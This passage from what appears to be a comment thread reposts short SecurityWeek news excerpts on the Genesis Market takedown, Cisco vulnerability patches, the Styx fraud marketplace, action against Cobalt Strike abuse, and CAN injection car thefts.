While the press releases issued by government and law enforcement agencies describe the action as a takedown, disruption, and dismantlement, the extent of the operation’s impact has been called into question.
More than 100 people have been arrested around the world, but they are likely users of the site rather than administrators.
Cybersecurity firm ZeroFox noted that Genesis Market can still be accessed on Tor and it remains stable and functional. In addition, the site’s administrators announced that they plan on setting up new domains.
Tomi Engdahl says:
Cisco Patches Code and Command Execution Vulnerabilities in Several Products
https://www.securityweek.com/cisco-patches-code-and-command-execution-vulnerabilities-in-several-products/
Cisco has released patches for high-severity vulnerabilities impacting Secure Network Analytics and Identity Services Engine (ISE) products.
Cisco this week announced patches for multiple vulnerabilities across its product portfolio, including high-severity issues impacting its Secure Network Analytics and Identity Services Engine (ISE) products.
Tracked as CVE-2023-20102, the first bug is described as insufficient sanitization of user-provided data parsed into memory. An authenticated, remote attacker could send crafted HTTP requests to an affected device to achieve arbitrary code execution.
Cisco has addressed the vulnerability with the release of Secure Network Analytics 7.4.1-Patch SMC Rollup #5.
The tech giant also announced patches for an improper validation of parameters sent to the restricted shell in Cisco ISE, which could lead to privilege escalation.
Tomi Engdahl says:
Financial Fraud-Focused Cybercrime Marketplace ‘Styx’ Emerges
https://www.securityweek.com/financial-fraud-focused-cybercrime-marketplace-styx-emerges/
Recently identified dark web portal Styx Marketplace focuses on financial fraud, identity theft, and money laundering.
Tomi Engdahl says:
Malware & Threats
Technical, Legal Action Taken to Prevent Abuse of Cobalt Strike, Microsoft Software
https://www.securityweek.com/technical-legal-action-taken-to-prevent-abuse-of-cobalt-strike-microsoft-software/
Microsoft, Fortra and Health-ISAC have taken legal and technical action to prevent the abuse of the Cobalt Strike exploitation tool and Microsoft software.
Microsoft, cybersecurity firm Fortra, and the Health Information Sharing and Analysis Center (Health-ISAC) have taken legal and technical action in an effort to prevent the abuse of the Cobalt Strike exploitation tool, as well as the abuse of Microsoft software.
Cobalt Strike is a legitimate post-exploitation tool designed by Fortra for adversary simulation. While the company has been trying to prevent the abuse of its product, including by verifying the customers it’s sold to, threat actors have found ways to create cracked copies — typically older versions of the software — and abuse them in their malicious operations.
Cobalt Strike has been widely abused, including by profit-driven cybercriminals that run ransomware operations and state-sponsored threat groups associated with China, Russia, Iran and Vietnam.
Tomi Engdahl says:
Thieves Use CAN Injection Hack to Steal Cars
https://www.securityweek.com/thieves-use-can-injection-hack-to-steal-cars/
An innocent-looking portable speaker can hide a hacking device that launches CAN injection attacks, which have been used to steal cars.